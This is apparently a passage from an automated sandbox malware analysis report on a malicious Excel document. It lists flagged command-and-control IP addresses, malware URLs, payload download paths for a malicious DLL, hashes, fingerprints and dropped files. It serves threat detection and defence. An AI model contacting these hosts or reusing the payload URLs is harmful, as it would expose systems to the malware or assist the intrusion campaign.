                    https://secure.comodo.com/CPS0regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://165.22.254.68/regsvr32.exe, 00000007.00000002.1197000736.00000000003F3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://198.199.70.22/080/Fregsvr32.exe, 00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://198.199.70.22:8080/eregsvr32.exe, 00000007.00000002.1197037666.0000000000429000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://198.199.70.22:8080/aregsvr32.exe, 00000007.00000002.1197037666.0000000000429000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        157.245.111.0
                        		unknownUnited States
                        		14061DIGITALOCEAN-ASNUStrue
                        157.230.99.206
                        		unknownUnited States
                        		14061DIGITALOCEAN-ASNUStrue
                        54.37.106.167
                        		unknownFrance
                        		16276OVHFRtrue
                        196.44.98.190
                        		unknownGhana
                        		327814EcobandGHtrue
                        59.148.253.194
                        		unknownHong Kong
                        		9269HKBN-AS-APHongKongBroadbandNetworkLtdHKtrue
                        202.29.239.162
                        		unknownThailand
                        		4621UNINET-AS-APUNINET-THtrue
                        103.41.204.169
                        		unknownIndonesia
                        		58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                        36.67.23.59
                        		unknownIndonesia
                        		17974TELKOMNET-AS2-APPTTelekomunikasiIndonesiaIDtrue
                        165.22.254.68
                        		unknownUnited States
                        		14061DIGITALOCEAN-ASNUStrue
                        103.56.149.105
                        		unknownIndonesia
                        		55688BEON-AS-IDPTBeonIntermediaIDtrue
                        85.214.67.203
                        		unknownGermany
                        		6724STRATOSTRATOAGDEtrue
                        68.183.91.111
                        		unknownUnited States
                        		14061DIGITALOCEAN-ASNUStrue
                        85.25.120.45
                        		unknownGermany
                        		8972GD-EMEA-DC-SXB1DEtrue
                        188.132.217.108
                        		kronostr.comTurkey
                        		42910PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTRfalse
                        198.199.70.22
                        		unknownUnited States
                        		14061DIGITALOCEAN-ASNUStrue
                        93.104.209.107
                        		unknownGermany
                        		8767MNET-ASGermanyDEtrue
                        208.67.23.91
                        		zardamarine.comUnited States
                        		3257GTT-BACKBONEGTTDEtrue
                        188.225.32.231
                        		unknownRussian Federation
                        		9123TIMEWEB-ASRUtrue
                        175.126.176.79
                        		unknownKorea Republic of
                        		9523MOKWON-AS-KRMokwonUniversityKRtrue
                        139.196.72.155
                        		unknownChina
                        		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                        165.232.185.110
                        		unknownUnited States
                        		22255ALLEGHENYHEALTHNETWORKUStrue
                        104.248.225.227
                        		unknownUnited States
                        		14061DIGITALOCEAN-ASNUStrue
                        103.126.216.86
                        		unknownBangladesh
                        		138482SKYVIEW-AS-APSKYVIEWONLINELTDBDtrue
                        128.199.217.206
                        		unknownUnited Kingdom
                        		14061DIGITALOCEAN-ASNUStrue
                        116.124.128.206
                        		unknownKorea Republic of
                        		9318SKB-ASSKBroadbandCoLtdKRtrue
                        103.224.241.74
                        		unknownIndia
                        		133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINtrue
                        103.71.99.57
                        		unknownIndia
                        		135682AWDHPL-AS-INAdvikaWebDevelopmentsHostingPvtLtdINtrue
                        210.57.209.142
                        		unknownIndonesia
                        		38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                        202.28.34.99
                        		unknownThailand
                        		9562MSU-TH-APMahasarakhamUniversityTHtrue
                        87.106.97.83
                        		unknownGermany
                        		8560ONEANDONE-ASBrauerstrasse48DEtrue
                        103.254.12.236
                        		unknownViet Nam
                        		56151DIGISTAR-VNDigiStarCompanyLimitedVNtrue
                        103.85.95.4
                        		unknownIndonesia
                        		136077IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramIDtrue
                        54.37.228.122
                        		unknownFrance
                        		16276OVHFRtrue
                        202.134.4.210
                        		unknownIndonesia
                        		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                        88.217.172.165
                        		unknownGermany
                        		8767MNET-ASGermanyDEtrue
                        195.77.239.39
                        		unknownSpain
                        		60493FICOSA-ASEStrue
                        165.22.254.236
                        		unknownUnited States
                        		14061DIGITALOCEAN-ASNUStrue
                        78.47.204.80
                        		unknownGermany
                        		24940HETZNER-ASDEtrue
                        118.98.72.86
                        		unknownIndonesia
                        		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                        66.96.149.19
                        		labfitouts.comUnited States
                        		29873BIZLAND-SDUSfalse
                        104.244.79.94
                        		unknownUnited States
                        		53667PONYNETUStrue
                        37.44.244.177
                        		unknownGermany
                        		47583AS-HOSTINGERLTtrue
                        178.62.112.199
                        		unknownEuropean Union
                        		14061DIGITALOCEAN-ASNUStrue
                        62.171.178.147
                        		unknownUnited Kingdom
                        		51167CONTABODEtrue
                        64.227.55.231
                        		unknownUnited States
                        		14061DIGITALOCEAN-ASNUStrue

                        General Information

                        Joe Sandbox Version:35.0.0 Citrine
                        Analysis ID:679676
                        Start date and time: 06/08/202209:19:172022-08-06 09:19:17 +02:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 24s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:documentazione 68668.xls
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.winXLS@10/13@3/45
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 17.1% (good quality ratio 13.6%)
                        • Quality average: 69.8%
                        • Quality standard deviation: 40.4%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 18
                        • Number of non-executed functions: 128
                        Cookbook Comments:
                        • Found application associated with file extension: .xls
                        • Adjust boot time
                        • Enable AMSI
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe
                        • Excluded IPs from analysis (whitelisted): 209.197.3.8, 93.184.221.240
                        • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        09:19:26API Interceptor532x Sleep call for process: regsvr32.exe modified
                        09:19:26API Interceptor212x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        157.245.111.0H 05072022.xlsGet hashmaliciousBrowse
                          548IrCt4hj.dllGet hashmaliciousBrowse
                            548IrCt4hj.dllGet hashmaliciousBrowse
                              5CUFfVMSaQ.dllGet hashmaliciousBrowse
                                Bericht 6581.xlsGet hashmaliciousBrowse
                                  PYCkUgesWB.dllGet hashmaliciousBrowse
                                    azKC4bycQq.dllGet hashmaliciousBrowse
                                      HUrHMu39FU.dllGet hashmaliciousBrowse
                                        HUrHMu39FU.dllGet hashmaliciousBrowse
                                          5Fa665mRHe.dllGet hashmaliciousBrowse
                                            8QfaZFMbEb.dllGet hashmaliciousBrowse
                                              ik1z1nXXuU.dllGet hashmaliciousBrowse
                                                xWvN5HkNDU.dllGet hashmaliciousBrowse
                                                  bOc8U9QEOx.dllGet hashmaliciousBrowse
                                                    P22l0y2mfd.dllGet hashmaliciousBrowse
                                                      ik1z1nXXuU.dllGet hashmaliciousBrowse
                                                        xWvN5HkNDU.dllGet hashmaliciousBrowse
                                                          td722u34As.dllGet hashmaliciousBrowse
                                                            MZ5g6cEEr6.dllGet hashmaliciousBrowse
                                                              MZ5g6cEEr6.dllGet hashmaliciousBrowse
                                                                157.230.99.206H 05072022.xlsGet hashmaliciousBrowse
                                                                  548IrCt4hj.dllGet hashmaliciousBrowse
                                                                    548IrCt4hj.dllGet hashmaliciousBrowse
                                                                      5CUFfVMSaQ.dllGet hashmaliciousBrowse
                                                                        Bericht 6581.xlsGet hashmaliciousBrowse
                                                                          PYCkUgesWB.dllGet hashmaliciousBrowse
                                                                            nz032vqLOi.dllGet hashmaliciousBrowse
                                                                              nz032vqLOi.dllGet hashmaliciousBrowse
                                                                                azKC4bycQq.dllGet hashmaliciousBrowse
                                                                                  HUrHMu39FU.dllGet hashmaliciousBrowse
                                                                                    HUrHMu39FU.dllGet hashmaliciousBrowse
                                                                                      5Fa665mRHe.dllGet hashmaliciousBrowse
                                                                                        5Fa665mRHe.dllGet hashmaliciousBrowse
                                                                                          8QfaZFMbEb.dllGet hashmaliciousBrowse
                                                                                            P22l0y2mfd.dllGet hashmaliciousBrowse
                                                                                              xWvN5HkNDU.dllGet hashmaliciousBrowse
                                                                                                P22l0y2mfd.dllGet hashmaliciousBrowse
                                                                                                  ik1z1nXXuU.dllGet hashmaliciousBrowse
                                                                                                    td722u34As.dllGet hashmaliciousBrowse
                                                                                                      MZ5g6cEEr6.dllGet hashmaliciousBrowse

                                                                                                        Domains

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        kronostr.comDOC 18860.xlsGet hashmaliciousBrowse
                                                                                                        • 188.132.217.108
                                                                                                        9880-0806.xlsGet hashmaliciousBrowse
                                                                                                        • 188.132.217.108
                                                                                                        Documenti_08.xlsGet hashmaliciousBrowse
                                                                                                        • 188.132.217.108
                                                                                                        SCAN_26.xlsGet hashmaliciousBrowse
                                                                                                        • 188.132.217.108
                                                                                                        info_6599433394.xlsGet hashmaliciousBrowse
                                                                                                        • 188.132.217.108
                                                                                                        DOCUMENTO_907996.xlsGet hashmaliciousBrowse
                                                                                                        • 188.132.217.108
                                                                                                        report-2781679.xlsGet hashmaliciousBrowse
                                                                                                        • 188.132.217.108
                                                                                                        EM_08062022.doc.xlsGet hashmaliciousBrowse
                                                                                                        • 188.132.217.108
                                                                                                        Scan-8229381127.xlsGet hashmaliciousBrowse
                                                                                                        • 188.132.217.108
                                                                                                        labfitouts.comDOC 18860.xlsGet hashmaliciousBrowse
                                                                                                        • 66.96.149.19
                                                                                                        9880-0806.xlsGet hashmaliciousBrowse
                                                                                                        • 66.96.149.19
                                                                                                        Documenti_08.xlsGet hashmaliciousBrowse
                                                                                                        • 66.96.149.19
                                                                                                        SCAN_26.xlsGet hashmaliciousBrowse
                                                                                                        • 66.96.149.19
                                                                                                        info_6599433394.xlsGet hashmaliciousBrowse
                                                                                                        • 66.96.149.19
                                                                                                        DOCUMENTO_907996.xlsGet hashmaliciousBrowse
                                                                                                        • 66.96.149.19
                                                                                                        report-2781679.xlsGet hashmaliciousBrowse
                                                                                                        • 66.96.149.19
                                                                                                        EM_08062022.doc.xlsGet hashmaliciousBrowse
                                                                                                        • 66.96.149.19

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        DIGITALOCEAN-ASNUSJLZS1r7VL2Get hashmaliciousBrowse
                                                                                                        • 159.65.183.95
                                                                                                        hOP0tFKwjiGet hashmaliciousBrowse
                                                                                                        • 206.189.30.141
                                                                                                        http://tiny.cc/cmp_fac_3kt571ftxGet hashmaliciousBrowse
                                                                                                        • 157.245.113.153
                                                                                                        http://r.email.rdv360.com/tr/cl/tl7Wu25UHrnjkn5sfc0vx0u4dtyo0w00PXMuL2iagRDUR4r6sEL0l9C97pb-2sRztT-v8bXx-XwXmfdSPRXPxbz7LHu0VNziyeYAzkCiIjcvnS7WBSJwBh3b5lynhLuGZ-icKIPKLG1_Nge8zb9RKR3x8-eqdE9Z6NZ1eNGz7xHfVQji-8Y3Ly2KhJRTjnC_XVffoO3v2wTAX7vCTKg95DV-fGkRhyk0Etop2L_GVfVQwjhA4X5PZ4rHEGj4_1HhHvnPUbiBjyJo5lqUbQIGet hashmaliciousBrowse
                                                                                                        • 5.101.110.225
                                                                                                        http://byyyyywcsx8fg07v520000ctv23sczeac.interact.shGet hashmaliciousBrowse
                                                                                                        • 46.101.25.250
                                                                                                        http://caezcs32vtc000025v70gf8xscwyyyyyb.interact.shGet hashmaliciousBrowse
                                                                                                        • 46.101.25.250
                                                                                                        zapytanie ofertowe09356.exeGet hashmaliciousBrowse
                                                                                                        • 167.99.102.63
                                                                                                        http://9b16e70612995.moonlinetours.com/wb/#YlM1dFlXUnJiM1Z5UUdWcFlpNXZjbWNOGet hashmaliciousBrowse
                                                                                                        • 134.209.198.33
                                                                                                        https://express.adobe.com/page/CcLfxao1xl54w/Get hashmaliciousBrowse
                                                                                                        • 5.101.109.44
                                                                                                        zH4aQ6xq4y.exeGet hashmaliciousBrowse
                                                                                                        • 64.225.91.73
                                                                                                        Bridegroomship.exeGet hashmaliciousBrowse
                                                                                                        • 139.59.104.17
                                                                                                        bDUH.exeGet hashmaliciousBrowse
                                                                                                        • 67.205.142.16
                                                                                                        IIntoAndEvenHow.dllGet hashmaliciousBrowse
                                                                                                        • 159.89.43.72
                                                                                                        https://www.whioce.com/cpanel/cpanell/cpwebmail/?email=jerrym@dwotc.comGet hashmaliciousBrowse
                                                                                                        • 128.199.167.230
                                                                                                        hisTheseSheHimThen.dllGet hashmaliciousBrowse
                                                                                                        • 159.89.43.72
                                                                                                        r7QEABnuNrGet hashmaliciousBrowse
                                                                                                        • 134.123.13.158
                                                                                                        https://sfo3.digitaloceanspaces.com/teeblch7s892hd901syx17x80/%21%26%21%24%21.%28%26%26%21%24%21%24%21/%26%26%21%24%21%26%21%24%210.%24%21%24.html#access.information@southerntrust.hscni.netGet hashmaliciousBrowse
                                                                                                        • 138.68.34.161
                                                                                                        http://caezcs32vtc000025v70gf8xscwyyyyyb.interact.shGet hashmaliciousBrowse
                                                                                                        • 46.101.25.250
                                                                                                        CgFJBVFNlg.exeGet hashmaliciousBrowse
                                                                                                        • 167.99.35.88
                                                                                                        cv-MariiaPecherska.docxGet hashmaliciousBrowse
                                                                                                        • 128.199.38.50
                                                                                                        DIGITALOCEAN-ASNUSJLZS1r7VL2Get hashmaliciousBrowse
                                                                                                        • 159.65.183.95
                                                                                                        hOP0tFKwjiGet hashmaliciousBrowse
                                                                                                        • 206.189.30.141
                                                                                                        http://tiny.cc/cmp_fac_3kt571ftxGet hashmaliciousBrowse
                                                                                                        • 157.245.113.153
                                                                                                        http://r.email.rdv360.com/tr/cl/tl7Wu25UHrnjkn5sfc0vx0u4dtyo0w00PXMuL2iagRDUR4r6sEL0l9C97pb-2sRztT-v8bXx-XwXmfdSPRXPxbz7LHu0VNziyeYAzkCiIjcvnS7WBSJwBh3b5lynhLuGZ-icKIPKLG1_Nge8zb9RKR3x8-eqdE9Z6NZ1eNGz7xHfVQji-8Y3Ly2KhJRTjnC_XVffoO3v2wTAX7vCTKg95DV-fGkRhyk0Etop2L_GVfVQwjhA4X5PZ4rHEGj4_1HhHvnPUbiBjyJo5lqUbQIGet hashmaliciousBrowse
                                                                                                        • 5.101.110.225
                                                                                                        http://byyyyywcsx8fg07v520000ctv23sczeac.interact.shGet hashmaliciousBrowse
                                                                                                        • 46.101.25.250
                                                                                                        http://caezcs32vtc000025v70gf8xscwyyyyyb.interact.shGet hashmaliciousBrowse
                                                                                                        • 46.101.25.250
                                                                                                        zapytanie ofertowe09356.exeGet hashmaliciousBrowse
                                                                                                        • 167.99.102.63
                                                                                                        http://9b16e70612995.moonlinetours.com/wb/#YlM1dFlXUnJiM1Z5UUdWcFlpNXZjbWNOGet hashmaliciousBrowse
                                                                                                        • 134.209.198.33
                                                                                                        https://express.adobe.com/page/CcLfxao1xl54w/Get hashmaliciousBrowse
                                                                                                        • 5.101.109.44
                                                                                                        zH4aQ6xq4y.exeGet hashmaliciousBrowse
                                                                                                        • 64.225.91.73
                                                                                                        Bridegroomship.exeGet hashmaliciousBrowse
                                                                                                        • 139.59.104.17
                                                                                                        bDUH.exeGet hashmaliciousBrowse
                                                                                                        • 67.205.142.16
                                                                                                        IIntoAndEvenHow.dllGet hashmaliciousBrowse
                                                                                                        • 159.89.43.72
                                                                                                        https://www.whioce.com/cpanel/cpanell/cpwebmail/?email=jerrym@dwotc.comGet hashmaliciousBrowse
                                                                                                        • 128.199.167.230
                                                                                                        hisTheseSheHimThen.dllGet hashmaliciousBrowse
                                                                                                        • 159.89.43.72
                                                                                                        r7QEABnuNrGet hashmaliciousBrowse
                                                                                                        • 134.123.13.158
                                                                                                        https://sfo3.digitaloceanspaces.com/teeblch7s892hd901syx17x80/%21%26%21%24%21.%28%26%26%21%24%21%24%21/%26%26%21%24%21%26%21%24%210.%24%21%24.html#access.information@southerntrust.hscni.netGet hashmaliciousBrowse
                                                                                                        • 138.68.34.161
                                                                                                        http://caezcs32vtc000025v70gf8xscwyyyyyb.interact.shGet hashmaliciousBrowse
                                                                                                        • 46.101.25.250
                                                                                                        CgFJBVFNlg.exeGet hashmaliciousBrowse
                                                                                                        • 167.99.35.88
                                                                                                        cv-MariiaPecherska.docxGet hashmaliciousBrowse
                                                                                                        • 128.199.38.50

                                                                                                        JA3 Fingerprints

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        7dcce5b76c8b17472d024758970a406bSampleData.xlsxGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        MT.htmlGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        Contract - Wipak Oy.xlsxGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        ORDER Wipak - OY 89479444.xlsxGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        RFQ - 0740089380 WIpak Oy July.xlsxGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        2TNI4tecBe.docxGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        FA0000017284..docxGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        https://www.evernote.com/shard/s551/sh/f0e07909-8f15-8726-68d2-99b1153d02f2/5d2b75f789fe653c6d0cc061b861b114Get hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        ACH_WIRE_REMITTANCE.xlsxGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        2_202208329496808197.xlsmGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        4_202208782733399536.xlsmGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        9_202208511985921120.xlsmGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        Invoice August 2022 DSC.htmlGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        ACH_WIRE_REMITTANCE.xlsxGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        Pago.xlsGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        ACH_WIRE_REMITTANCE.xlsxGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        QAF2022-1553 EF.xlsxGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        SPM Strength_Vessel's Certificate.xlsxGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        W23578.xlsxGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91
                                                                                                        ACH_WIRE_REMITTANCE.xlsxGet hashmaliciousBrowse
                                                                                                        • 208.67.23.91

                                                                                                        Dropped Files

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy)DOC 18860.xlsGet hashmaliciousBrowse
                                                                                                          9880-0806.xlsGet hashmaliciousBrowse
                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dllDOC 18860.xlsGet hashmaliciousBrowse
                                                                                                              9880-0806.xlsGet hashmaliciousBrowse
                                                                                                                C:\Users\user\wdusx2.ocxDOC 18860.xlsGet hashmaliciousBrowse
                                                                                                                  9880-0806.xlsGet hashmaliciousBrowse

                                                                                                                    Created / dropped Files

                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                                    File Type:Microsoft Cabinet archive data, 61712 bytes, 1 file
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):61712
                                                                                                                    Entropy (8bit):7.995044632446497
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
                                                                                                                    MD5:589C442FC7A0C70DCA927115A700D41E
                                                                                                                    SHA1:66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
                                                                                                                    SHA-256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
                                                                                                                    SHA-512:1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview:MSCF............,...................I........y.........Tf. .authroot.stl..W.`.4..CK..8U[...q.yL'sf!d.D..."2.2g.<dVI.!.....$).\...!2s..(...[.T7..{}...g....g.....w.km$.&|..qe.n.8+..&...O...`...+..C......`h!0.I.(C..1Q*L.p..".s..B.....H......fUP@..5...(X#.t.2lX.>.y|D.0Z0...M....I(.#.-... ...(.J....2..`.hO..{l+.bd7y.j..u.....3....<......3....s.T...._.'...%{v...s..............KgV.0..X=.A.9w9.Ea.x..........\.=.e.C2......9.......`.o... .......@pm.. a.....-M.....{...s.mW.....;.+...A......0.g..L9#.v.&O>./xSH.S.....GH.6.j...`2.(0g..... Lt........h4.iQ?....[.K.....uI......}.....d....M.....6q.Q~.0.\.'U^)`..u.....-........d..7...2.-.2+3.....A./.%Q...k...Q.,...H.B.%..O..x..5\...Hk.......B.';"Ym.'....X.l.E.6..a8.6..nq..x.r4..1t.....,..u.O..O.L...Uf...X.u.F .(.(.....".q...n{%U.-u....l6!....Z....~o0.}Q'.s.i....7...>4x...A.h.Mk].O.z.].6...53...b^;..>e..x.'1..\p.O.k..B1w..|..K.R.....2.e0..X.^...I...w..!.v5B]x..z.6.G^uF..].b.W...'..I.;..p..@L{.E..@W..3.&...

                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):326
                                                                                                                    Entropy (8bit):3.135891594007862
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:kKxHe+N+SkQlPlEGYRMY9z+4KlDA3RUeWlEZ21:NeNkPlE99SNxAhUeE1
                                                                                                                    MD5:7E3A227B994264795E9EAE1F3EFCE18C
                                                                                                                    SHA1:61D017570E793456ADDC368F8128C8BE6D3233E8
                                                                                                                    SHA-256:7329C78BA23EA793109E9211BDD5E7B9217B3064830B5E17B0BEBE3733B0FE7E
                                                                                                                    SHA-512:1F1C834F156D80641D15C5F3FD7D36FCB9D8926F3709228F6325EEFC4ADEE0458406BF8D09244B7727DA5C9150376F7CA6335E1C49C6F0509567283AF0A6953A
                                                                                                                    Malicious:false
                                                                                                                    Preview:p...... .........X......(....................................................... .........L.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.f.4.c.9.6.9.8.b.d.8.1.:.0."...

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\Rea3Iu3wGvgAbTset0[1].htm

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):6424
                                                                                                                    Entropy (8bit):5.110994009346991
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:vGzZELraVLYVQyS2qiCquqHlmRxMsVoWQ2z1:KZELraVUVZfqquq0jaIz1
                                                                                                                    MD5:2826B1E7AF14A75FEE51D4E4534EEFF5
                                                                                                                    SHA1:C9EAB9B2B15CFFC0273B3F8D197007B025018838
                                                                                                                    SHA-256:8CC3FE518E10BFEDD841106B51A5B0FBC337161CFC4D7360DB0436EE9D1A68E5
                                                                                                                    SHA-512:1C77D4A9EDE815B53DF07220742E43A180097F066BE9A6C3AC22F573910955DDB0047700F9F277BD6C794D8560865AD28CF58DE40BB1F939EA4C8CF7F28BA39E
                                                                                                                    Malicious:false
                                                                                                                    IE Cache URL:http://labfitouts.com/cgi-bin/Rea3Iu3wGvgAbTset0/
                                                                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.. <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" /><meta name="robots" content="noindex, nofollow" /> <title>iPage</title> <link rel="stylesheet" type="text/css" href="http://www1.ipage.com/xslt/elements/generic_csscomponent.css" /> <script src="http://www1.ipage.com/generalAppC/scriptcat/87ae207201c55b84c5270851159260e1.1" type="text/javascript"></script></head><body id="stylesheet1"><style>#nav li {display: inline-block;}a.nav-thin-right {padding: 0 30px;}#nav li a.loginkey, #nav li a.loginkey:hover {background-position: -8px -8px;}</style> <div id="doc2" class="yui-t2"> <div id="hd" style="width: 950px;"> <div id="masthead" style="position: relative;"> <h1><a href="http://www.ipage.com/">iPage</a></h1> <h2>Powerful Web Hosting and Domain Names for Home and Business</h2><img src="http:

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):661504
                                                                                                                    Entropy (8bit):4.956080357124322
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HioEnJyVLryVLryVLryVLryVLryVLryVLGLO8yMZodxz51dPRHh+u392986Ugn:CAYYYYYY6a8S91d5Yu3w+6
                                                                                                                    MD5:3F418FE2743B42214FC4A6D6BDD15A13
                                                                                                                    SHA1:45A780014944CB01407EAB26D0E472C7E37D4963
                                                                                                                    SHA-256:1EC9DC22A44EB1BD30B4C56B12CCAE1CFCB67F9ABA8F3A8E4A3DE562D237371E
                                                                                                                    SHA-512:1CEE67179EBC7E000F1CA8AAF7BC88603A19A9A0352B1CE751DFFC3EE660211236BDF1F6C2E6BEED4503FC960E128D21230032E6EF0776058FCE26C195E1B00F
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Metadefender, Detection: 40%, Browse
                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: DOC 18860.xls, Detection: malicious, Browse
                                                                                                                    • Filename: 9880-0806.xls, Detection: malicious, Browse
                                                                                                                    IE Cache URL:http://kronostr.com/tr/68yHRhfuU7Qj/
